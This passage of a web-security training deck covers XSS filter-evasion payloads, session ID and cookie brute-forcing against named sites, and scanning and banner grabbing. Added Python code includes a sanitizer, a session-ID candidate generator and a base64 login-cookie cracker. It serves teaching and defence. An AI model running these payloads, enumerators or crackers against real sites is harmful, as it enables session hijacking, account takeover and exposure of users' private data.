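The entity, alternate-scheme and curly-brace tricks on slides 81 through 93 all defeat a filter that compares the raw attribute value against a fixed string. The Python below is an added example, not code from the slides: it shows the check a filter has to make instead (decode entities, including zero-padded and double-encoded ones, strip the control characters old browsers tolerated inside a scheme name, lower-case, and only then look at the scheme), and then uses that check inside an allow-list sanitizer built from the tag and attribute lists on slides 94 and 95. The tag and attribute sets, the `naive_filter_blocks` stand-in for a weak filter, and the sample fragments are assumptions made for the example.

```python
"""Entity-aware scheme check plus an allow-list HTML sanitizer (added example)."""
import html
import re
from html.parser import HTMLParser

# Tags the slides call most insidious: dropped outright (script/style bodies too).
DANGEROUS_TAGS = {
    "applet", "body", "embed", "frame", "frameset", "html", "iframe", "img",
    "layer", "ilayer", "meta", "object", "script", "style",
}
SKIP_CONTENT = {"script", "style"}
# Attributes that carry a URL; STYLE and every on* handler are dropped unconditionally.
URL_ATTRS = {"src", "lowsrc", "href"}
SCRIPT_SCHEMES = {"javascript", "livescript", "mocha"}


def normalize(value: str) -> str:
    """Decode entities the way a browser would (decimal, hex, zero-padded, even
    double-encoded), then strip every byte <= 0x20, which old browsers ignored
    inside a scheme name, and lower-case the result."""
    decoded = value
    for _ in range(3):                      # bounded: defeats &amp;#106; style nesting
        nxt = html.unescape(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return re.sub(r"[\x00-\x20]", "", decoded).lower()


def naive_filter_blocks(value: str) -> bool:
    """The kind of check the slides bypass: a literal prefix match on the raw value."""
    return value.lower().startswith("javascript:")


def is_script_url(value: str) -> bool:
    """Robust check: look at the scheme only after normalisation, and also catch
    Netscape's &{...} JavaScript-entity form, which has no scheme at all."""
    norm = normalize(value)
    scheme = norm.split(":", 1)[0] if ":" in norm else ""
    return scheme in SCRIPT_SCHEMES or "&{" in norm


class Sanitizer(HTMLParser):
    """Allow-list pass: ordinary tags survive with their safe attributes, dangerous
    tags vanish, and attribute values are re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0                       # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            if tag in SKIP_CONTENT:
                self.skip += 1
            return
        kept = []
        for name, val in attrs:             # HTMLParser has already entity-decoded val
            name = name.lower()
            if name.startswith("on") or name == "style":
                continue
            if name in URL_ATTRS and val is not None and is_script_url(val):
                continue
            kept.append((name, val))
        rendered = "".join(
            f' {n}="{html.escape(v, quote=True)}"' if v is not None else f" {n}"
            for n, v in kept
        )
        self.out.append(f"<{tag}{rendered}>")

    def handle_endtag(self, tag):
        if tag in DANGEROUS_TAGS:
            if tag in SKIP_CONTENT and self.skip:
                self.skip -= 1
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))


def sanitize(fragment: str) -> str:
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Payloads taken from the slides; each slips past the naive prefix match.
    for payload in ("java&#010;script:alert('test')", "java&#X0A;script:alert('test')",
                    "java&#000009;script:alert('test')", "mocha:alert('test')",
                    "&{alert('alert')};"):
        print(f"{payload:40} naive={naive_filter_blocks(payload)!s:5} robust={is_script_url(payload)}")
    print(sanitize('<a href="java&#010;script:alert(1)" onmouseover="alert(2)">x</a>'
                   '<IMG SRC="mocha:alert(3)"><p style="left:expression(alert(4))">hi</p>'))
```

The order matters: decoding before stripping is what turns `java&#000009;script:` into `javascript:`, and comparing schemes rather than substrings is what keeps an innocent `http://` URL alive. The sanitizer never tries to "fix" a bad value; it drops the attribute or the tag, which is the only outcome an allow-list can justify.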

Page 96:

Web Application Logins

Page 97:

Traditional Brute Force

• Try the usual default and weak credentials against the login form:

guest

Admin

123123

Password

Etc.

Page 98:

Session ID Overview

• HTTP is a stateless protocol.

• Rather than make the user authenticate on every click in a web application, a sense of "state" is created.

• To maintain that state, developers usually rely on a shared string, token or secret between the HTTP client and the server.

• Essentially, the authentication data (username/password) is exchanged for a "Session ID".

Page 99:

Web State Attacks

• Session Replay
– A replay attack in the traditional cryptographic sense: a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.

• Session Hijacking
– Seizing control of a legitimate user's web application session while that user is "logged in" to the application.

Page 100:

Session ID

• Session ID should IN THEORY be just as secure as username/password

Page 101:

Session ID Overview

• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).

Page 102:

Session ID Overview

• Session IDs are commonly stored in cookies and/or URLs, and in hidden fields of web pages (or some combination).

• The Session ID is generated either by the WEB SERVER (IIS, etc.) when the user first hits the site, or by the WEB APPLICATION (ATG Dynamo, Apache Tomcat, IBM WebSphere, BEA WebLogic, .jsp, .asp, Perl, etc.) when the user logs in.

Page 103:

Cookie Refresher

• Sometimes cookies are set to expire (i.e., be deleted) when the browser is closed; these are typically called "session cookies" or "non-persistent" cookies.

• Persistent cookies last beyond a user's session (e.g., a "Remember Me" option).

• Persistent cookies are usually stored on the user's hard drive in a location that depends on the operating system and browser (e.g., C:\Program Files\Netscape\Users\username\cookies.txt for Netscape and C:\Documents and Settings\username\Cookies for IE on Win2K).

Page 104:

Cookie Refresher (RFC 2965)

Fields of a Netscape-format cookies.txt entry:

1.) domain: The website domain that created and that can read the variable.
2.) flag: A TRUE/FALSE value indicating whether all machines within the given domain can access the variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating whether an SSL connection with the domain is needed to access the variable.
5.) expiration: The Unix time at which the variable will expire. Unix time is the number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date tells the browser to store the cookie only in memory; it is erased when the browser is closed. (The example below expires July 27, 2006.)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480).

www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480

(fields 1 through 7, left to right)

Page 105:

Cookie Stored Session ID Examples

.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2

.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2

.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034

.ebay.com TRUE / FALSE 1183296824 lucky8 694036

.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437

.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl

.yahoo.com TRUE / FALSE 1154029490 PU t=1

Page 106:

URL Stored Session ID

• http://www.123greetings.com/view/7AD30725122120803
• http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB
• http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS
• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344

Page 107:

Session IDs in HTML Hidden Fields

<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value="abcde1234">
<input type="hidden" name="useraccount" value="673-12745">
<input type="submit" name="Access My Bank Information">
</form>

• Hidden fields are as editable by the client as any other parameter; the account number above is attacker-controlled unless the server re-checks it against the session.

Page 108:

Session ID Security Overview

Session ID security is a microcosm of web application security.

Web application security cuts through many different aspects of an organization's information security infrastructure.

Page 109:

An Example: Brute Forcing Session IDs in URLs

Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you.
--------Method 1--------
Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)

http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html

Page 110:

An Example: Brute Forcing Session IDs in URLs

http://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100

Five cards sent on July 25 at 12:21 PST all carry the substring 07251221: the "session ID" embeds the date and time of sending, so that part of the string costs an attacker nothing to guess. What remains is five "random" digits at the end of the URL that increase from one card to the next, and the window between two observed values bounds every ID issued in between.

Page 111:

An Example: Brute Forcing Session IDs in URLs (Automated Demo)

Page 112:

Why Brute Forcing Web Session IDs is Bad

• Can result in an online user's web application account being hijacked, or loss of privacy
• Easy to exploit
• Unlike a typical login scenario, there is no failed-login lockout
• Prevalent disclosure among security mailing lists
• Typical security solutions (firewalls, IDS, etc.) do nothing to detect the attacks
• Log data is usually not that detailed
• IDS is not well developed for web application attacks
• SSL (server side) does nothing to protect against these attacks: the guesses ride inside the encrypted channel just like legitimate requests

Page 113:

In the News

– "Privacy hole found in Verizon Wireless Web site", Computerworld, Sept 6, 2001.
http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
http://online.securityfocus.com/archive/1/211520

– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION
(note the small integer p_session_id in the URL)

Page 114:

URL Example: Brute Forcing Register.com

Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below.

http://mydomain.register.com/change_password.cgi?155218782787

Note: Above link will expire within three days

Page 115:

Example 2: Brute Forcing Web Session IDs

Five password-change tokens observed:

http://mydomain.register.com/change_password.cgi?486218782865
http://mydomain.register.com/change_password.cgi?440218782891
http://mydomain.register.com/change_password.cgi?685218782917
http://mydomain.register.com/change_password.cgi?505218782956
http://mydomain.register.com/change_password.cgi?435218782969

The middle digits 218782 are constant and the last three climb (865, 891, 917, 956, 969), so only the three leading digits and a narrow counter window stand between an attacker and another customer's password-reset link.
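Slides 110 and 115 do the analysis by eye. The Python below is an added example, not code from the slides, that does it mechanically for both sets of IDs: given a handful of observed values it reports which character positions actually vary, treats the trailing run of varying digits as a counter bounded by the smallest and largest observed value, sizes the resulting guess space, yields the candidate URLs an automated demo would request, and for contrast shows what a server should have issued instead. The sample IDs are the ones printed on the slides; the counter heuristic and the "earlier runs are uniformly random digits" assumption are assumptions of the example, not claims about those sites.

```python
"""Size the guess space of URL session IDs from a few observed samples (added example)."""
import math
import secrets

# Constructed lists: the IDs as printed on slides 110 and 115.
GREETING_IDS = ["AD30725122116211", "AD30725122118909", "AD30725122120803",
                "AD30725122122507", "AD30725122124100"]
REGISTER_IDS = ["486218782865", "440218782891", "685218782917",
                "505218782956", "435218782969"]


def varying_positions(samples):
    """Character positions at which the samples disagree. Everything else is a
    constant (or, as on slide 110, a date/time the attacker already knows)."""
    if len({len(s) for s in samples}) != 1:
        raise ValueError("samples must all have the same length")
    return [i for i in range(len(samples[0])) if len({s[i] for s in samples}) > 1]


def runs(positions):
    """Split a sorted position list into runs of consecutive positions."""
    out = []
    for p in positions:
        if out and out[-1][-1] == p - 1:
            out[-1].append(p)
        else:
            out.append([p])
    return out


def counter_window(samples, positions):
    """Smallest and largest value of the digits at `positions`; if that field is
    a counter, every ID issued between two observations lies in this window."""
    values = [int("".join(s[i] for i in positions)) for s in samples]
    return min(values), max(values)


def estimate_guesses(samples):
    """Heuristic (assumption of this example): the last run of varying digits is a
    counter bounded by the observed window; any earlier run is treated as uniformly
    random, 10 possibilities per digit."""
    groups = runs(varying_positions(samples))
    lo, hi = counter_window(samples, groups[-1])
    total = hi - lo + 1
    for g in groups[:-1]:
        total *= 10 ** len(g)
    return total


def naive_bits(samples):
    """What the ID would be worth if every varying digit were truly random."""
    return len(varying_positions(samples)) * math.log2(10)


def candidates(template, positions, lo, hi):
    """Yield IDs with the digits at `positions` set to each value in [lo, hi]."""
    width = len(positions)
    for n in range(lo, hi + 1):
        chars = list(template)
        for digit, pos in zip(f"{n:0{width}d}", positions):
            chars[pos] = digit
        yield "".join(chars)


def secure_session_id(nbytes=16):
    """What the server should issue: CSPRNG output (128 bits here), no structure."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    for label, ids in (("123greetings", GREETING_IDS), ("register.com", REGISTER_IDS)):
        pos = varying_positions(ids)
        print(f"{label}: varying positions {pos}, naive {naive_bits(ids):.1f} bits, "
              f"about {estimate_guesses(ids)} guesses under the counter heuristic")
    tail = runs(varying_positions(GREETING_IDS))[-1]
    lo, hi = counter_window(GREETING_IDS, tail)
    for url_id in candidates(GREETING_IDS[0], tail, lo, lo + 2):
        print("http://www.123greetings.com/view/" + url_id)
    print("secure alternative:", secure_session_id())
```

For the greeting-card IDs the naive count says 16.6 bits of entropy in the five varying digits; the counter heuristic says 7,890 requests cover everything sent between the first and last observed card, and slide 112's point about the absence of lockout is what makes that number affordable. The register.com tokens come out at about 105,000 guesses for three random leading digits times a 105-wide counter window, still trivial for a three-day validity period.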

Page 116:

URL Example – Brute Forcing Dfilm.com

-----Original Message-----

From: [email protected] [mailto:[email protected]]

Sent: Monday, July 01, 2002 1:38 PM

To: [email protected]

Subject: D.FILM Digital Movie for Dave

Dave created a digital movie for you!

You can view it at the following URL:

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

Cheers,

Dave and DFILM.

Be sure to check out the web site at http://www.dfilm.com

Page 117:

URL Example – Brute Forcing Dfilm.com

No privacy for other users' creations: the id is a plain sequential integer, so decrementing it walks through everyone else's movies.

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

http://mm.dfilm.com/mm2s/mm_route.php?id=110531

http://mm.dfilm.com/mm2s/mm_route.php?id=110530

http://mm.dfilm.com/mm2s/mm_route.php?id=110529

http://mm.dfilm.com/mm2s/mm_route.php?id=110528

http://mm.dfilm.com/mm2s/mm_route.php?id=110527

http://mm.dfilm.com/mm2s/mm_route.php?id=110526

http://mm.dfilm.com/mm2s/mm_route.php?id=…

Page 118:

URL Example – Sendomatic.com

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330

Page 119:

URL Example – Sendomatic.com

View other people's events. Crash a party, edit an event, cancel an event, etc.

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336
http://www.sendomatic.com/servlets/servlets/mysendo?uId=…

Page 120:

Cookie Example – Freeservers.com

Page 121:

Cookie Example – Freeservers.com

• LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;

• Base64-decode the string (e.g. with http://www.securitystats.com/tools/base64.asp):

testing123.itgo.com:1231234 (username:password)

• The cookie is nothing more than the credentials, reversibly encoded. Next, automate it with a Perl exploit that feeds encoded candidate strings into the cookie.

Page 122:

Cookie Example – Freeservers.com

% perl freeservershack.pl
trying test
trying test123
trying 123123
trying 1231234
Cracked it! The password to testing123.itgo.com is 1231234

The request sent for each guess (the capture below is the "123123" attempt; its base64 ends in "=", which travels URL-encoded as %3D):

GET http://testing123.itgo.com/cgi-bin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%

Page 123:

Cookie Example – Freeservers.com

• Or the much longer way: run the brute forcer over every possible cookie character combination rather than a wordlist.
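Slide 104 decodes a cookies.txt line by hand, and slides 121 through 123 turn the freeservers LOGIN cookie back into a password by re-encoding guesses. The Python below is an added example, not the perl script from the slides: it parses cookies.txt lines into the seven fields, tries a base64 decode on every value, flags the weaknesses the deck keeps returning to (credentials in the cookie, IP-derived values, no Secure flag), and reproduces the wordlist attack, including the %3D form visible in the raw request on slide 122. The cookie lines are copied from the slides; the testing123 line, the wordlist and the `weakness_hints` heuristics are the example's assumptions.

```python
"""Parse Netscape cookies.txt entries and replay the base64 LOGIN-cookie attack (added example)."""
import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import quote

# Constructed input: cookie lines from slides 104/105 plus the freeservers LOGIN cookie
# from slide 121. Real cookies.txt is tab-separated; whitespace-splitting handles both.
COOKIE_LINES = """\
www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437
testing123.itgo.com FALSE / FALSE 0 LOGIN dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0
"""


@dataclass
class Cookie:
    domain: str
    domain_wide: bool   # field 2, "flag"
    path: str
    secure: bool
    expires: int        # Unix time; 0 = session cookie
    name: str
    value: str


def parse_cookies_txt(text):
    cookies = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(None, 6)
        if len(f) != 7:
            raise ValueError(f"expected 7 fields: {line!r}")
        cookies.append(Cookie(f[0], f[1] == "TRUE", f[2], f[3] == "TRUE",
                              int(f[4]), f[5], f[6]))
    return cookies


def try_base64(value):
    """Decoded text if `value` is base64 of printable ASCII, else None."""
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


_IPV4_PREFIX = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}\.")


def weakness_hints(cookie):
    """Heuristics for the 'weak algorithm' and 'transmitted in the clear' problems."""
    hints = []
    if not cookie.secure:
        hints.append("no Secure flag: sent over plain HTTP too")
    if _IPV4_PREFIX.match(cookie.value):
        hints.append("value starts with a client IP (IP+timestamp style generation)")
    decoded = try_base64(cookie.value)
    if decoded and ":" in decoded:
        hints.append(f"base64 of credentials: {decoded}")
    return hints


def crack_login_cookie(target, host, wordlist):
    """Re-encode host:guess exactly as the site does and compare; the slide's
    request shows '=' padding URL-encoded as %3D, so compare that form as well."""
    for guess in wordlist:
        encoded = base64.b64encode(f"{host}:{guess}".encode()).decode()
        if target in (encoded, quote(encoded, safe="")):
            return guess
    return None


if __name__ == "__main__":
    for c in parse_cookies_txt(COOKIE_LINES):
        print(f"{c.domain:22} {c.name:14} {c.value[:40]:40} {'; '.join(weakness_hints(c))}")
    # Constructed wordlist mirroring slide 122's "trying ..." output.
    print("cracked:", crack_login_cookie("dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0",
                                        "testing123.itgo.com",
                                        ["test", "test123", "123123", "1231234"]))
```

Because the cookie is a deterministic function of the credentials, there is nothing to guess beyond the password itself: the attack is an ordinary offline-style dictionary run, submitted one request per guess, against an endpoint that, as slide 112 notes, never locks anyone out.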

Page 124:

Cookie/URL Example – Amazon.com

• Some sites use the URL AND a cookie for authentication:

Page 125:

6 Common Problems

• Weak Algorithm – Many of the most popular web sites today are using linear algorithms based on easily predictable inputs such as time or the client's IP address.

• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.

• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be found by exhaustive guessing if the key space is not sufficiently large.

Page 126:

6 Common Problems – Continued

• Indefinite Expiration on Server – Session IDs that do not expire on the web server give an attacker unlimited time to guess a valid Session ID.

• Transmitted in the Clear – If SSL is not in use while the Session ID cookie travels to and from the browser, the Session ID can be sniffed on a flat network, taking the guesswork away from a miscreant. This remains a problem where a proxy server terminates SSL: the leg behind the proxy is in the clear again.

• Insecure Retrieval – By tricking the user's browser into visiting another site, an attacker can retrieve stored Session ID information and exploit it before the user's session expires. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.

Page 127:

Tools

• Sessions Auditor - www.idefense.com/idtools/Session_Auditor.zip

• Visual Testing – WebSleuth - www.geocities.com/dzzie/sleuth

• WebProxy - www.atstake.com/research/tools/index.html

• HTTPush - httpush.sourceforge.net

• Achilles - www.digizen-security.com/downloads.html

• MiniBrowser - aignes.com/download.htm

Page 128:

Why Automated Tools Don't Work Very Well

• Some good things:
– Completeness
– Large knowledge bases (at least possibly)

• Puts web security assessment into the hands of anyone who calls themselves an "Information Security Expert".

Page 129:

Why Automated Tools Don't Work Very Well

• Every programmer does things a little differently
• Authentication schemes are hard to automate
• Error codes are not standardized
• Sometimes simple things like SSL get in the way

Page 130:

Why People are Better

• Recognition of subtle errors
• We understand the impact, and therefore the risk, of a vulnerability
• We are grounded in the fundamentals of computer science and are therefore able to find "real" bugs: flaws in logic

Page 131:

Web Hacking Accessories

• Some helpful tools include…
– A port scanner (Nmap et al.): www.insecure.org/nmap/
– Netcat, the network Swiss army knife: http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner, Whisker: http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– OpenSSL source and documentation (OpenSSL, RFC 2246)

Page 132:

New tools on the horizon…

• Nikto
– CGI scanner, similar to whisker 1.4. Checks for CGIs, common dirs, and old versions. Database frequently updated. http://www.cirt.net/

• WHArsenal
– Set of CGIs that plug into an existing Apache install. Allows for all kinds of requests while controlling/modifying request particulars. http://community.whitehatsec.com/

• @stake WebProxy
– Assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/

• Nessus
– Has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things. http://www.nessus.org/

Page 133:

Basic Training for Web Combat…

• Port scanning
– Look for well-known TCP web ports: 80, 81, 443, 8000, 8080, etc.

• Using FScan (from Foundstone):
fscan -p 80,81,443,8000,8080 10.0.0.1

• Using nmap (by Fyodor):
nmap -p 80,81,443,8000,8080 10.0.0.1

Page 134:

Basic Training for Web Combat…

• Fingerprinting – HTTP banner grabbing
– netcat as a TCP client (even telnet works); follow the request line with an empty line to send it:

nc 10.0.0.1 80
HEAD / HTTP/1.0

• Advanced HTTP methods:
– TRACE, OPTIONS, etc. (OPTIONS lists what the server allows; an enabled TRACE echoes the request, headers and cookies included, back to the caller)
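The netcat session above is done by hand; the Python below is an added example (not a tool from the slides) that sends the same HEAD and OPTIONS requests and interprets the reply: it pulls the Server and X-Powered-By banners out of the headers and lists the methods from the Allow header that deserve a second look. The two replies embedded in the block are constructed samples shaped like an Apache answer of the period, so the example runs offline; `send_raw` is the live path and is not exercised here.

```python
"""Send the banner-grab requests from the slide and interpret the replies (added example)."""
import socket

RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT"}

# Constructed replies, shaped like what a 2002-era Apache would return to HEAD and OPTIONS.
SAMPLE_HEAD = (b"HTTP/1.1 200 OK\r\n"
               b"Date: Mon, 01 Jul 2002 13:38:00 GMT\r\n"
               b"Server: Apache/1.3.26 (Unix) mod_ssl/2.8.10 OpenSSL/0.9.6d\r\n"
               b"X-Powered-By: PHP/4.2.1\r\n"
               b"Content-Type: text/html\r\n\r\n")
SAMPLE_OPTIONS = (b"HTTP/1.1 200 OK\r\n"
                  b"Server: Apache/1.3.26 (Unix)\r\n"
                  b"Allow: GET, HEAD, OPTIONS, TRACE, PUT\r\n"
                  b"Content-Length: 0\r\n\r\n")


def head_request(host):
    return f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def options_request(host):
    return f"OPTIONS * HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def send_raw(host, port, request, timeout=5.0):
    """Live equivalent of 'nc host 80' plus a typed request. Not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_response(raw):
    """Status line plus a dict of lower-cased header names; the body is ignored."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def fingerprint(raw):
    status, h = parse_response(raw)
    return {"status": status,
            "server": h.get("server", ""),
            "powered_by": h.get("x-powered-by", "")}


def risky_methods(raw_options_reply):
    """Methods from the Allow header that deserve a second look: TRACE echoes the
    request (cookies included) back to a script, PUT/DELETE change content."""
    _, h = parse_response(raw_options_reply)
    allowed = {m.strip().upper() for m in h.get("allow", "").split(",") if m.strip()}
    return sorted(allowed & RISKY_METHODS)


if __name__ == "__main__":
    print(fingerprint(SAMPLE_HEAD))
    print("risky methods:", risky_methods(SAMPLE_OPTIONS))
    # Against a live host: fingerprint(send_raw("10.0.0.1", 80, head_request("10.0.0.1")))
```

Banners lie often enough that the version strings are a starting point for the scanners on the next slides, not a conclusion; the Allow list, by contrast, is the server describing its own configuration.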

Page 135:

Basic Training for Web Combat…

Shaking the tree for the low-hanging fruit…

• Scan using a database of known web vulnerabilities.

• Whisker (by Rain Forest Puppy):
./whisker.pl -h 10.0.0.1 -I 1

• cgichk.c:
<snip>
"GET /cgi-bin/phf HTTP/1.0\n\n";
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
"GET /cgi-bin/test-cgi HTTP/1.0\n\n";
"GET /cgi-bin/php.cgi HTTP/1.0\n\n";

• ISS, Cybercop, Retina, etc.

Page 136: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

el33t hax0r Training for el33t hax0r Training for Web Combat…Web Combat…

What about SSL?

• Some SSL Myths:– “We are secure because we use SSL!”– “Strong 128 bit crypto being used”– “We use Digital Certificates signed by

VeriSign”

Page 137:

Proxy Over SSL

• Using netcat and OpenSSL, it is possible to create a simple two-line SSL proxy!
• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.

[Diagram: Web client -> nc (listening on port 80) -> openssl -> SSL web server (port 443)]

Page 138:

Assessment Tools

• Vulnerability scanners
– Look for a known list of vulnerable applications or technologies
– Do not (cannot) engage/scan custom applications and configurations
– General vulnerability scanners: ISS, Cybercop, Nessus
– Web-specific vulnerability scanners: WebInspect, whisker

Page 139:

Assessment Tools

• "Proxy monitors"
– HTTP proxy which monitors traffic, looking for web vulnerabilities as they pass
– Can analyze custom applications with the help of a user
– Examples: AppScan, RFProxy, HTTPush, Achilles

Page 140:

Root Causes of Web Hacks

• Complex web architectures may cause oversights in web server configuration.
• URL parsing.
• File canonicalization.
• The combination of underlying operating system and web server may leave holes.

Page 141:

Root Causes of Web Hacks

• Untested code used in web applications, to save time.
• Level of security consciousness is low among web application developers.
• Security vs. convenience.
• Security vs. time-to-market.
• Zero-knowledge administration breeds zero-knowledge administrators.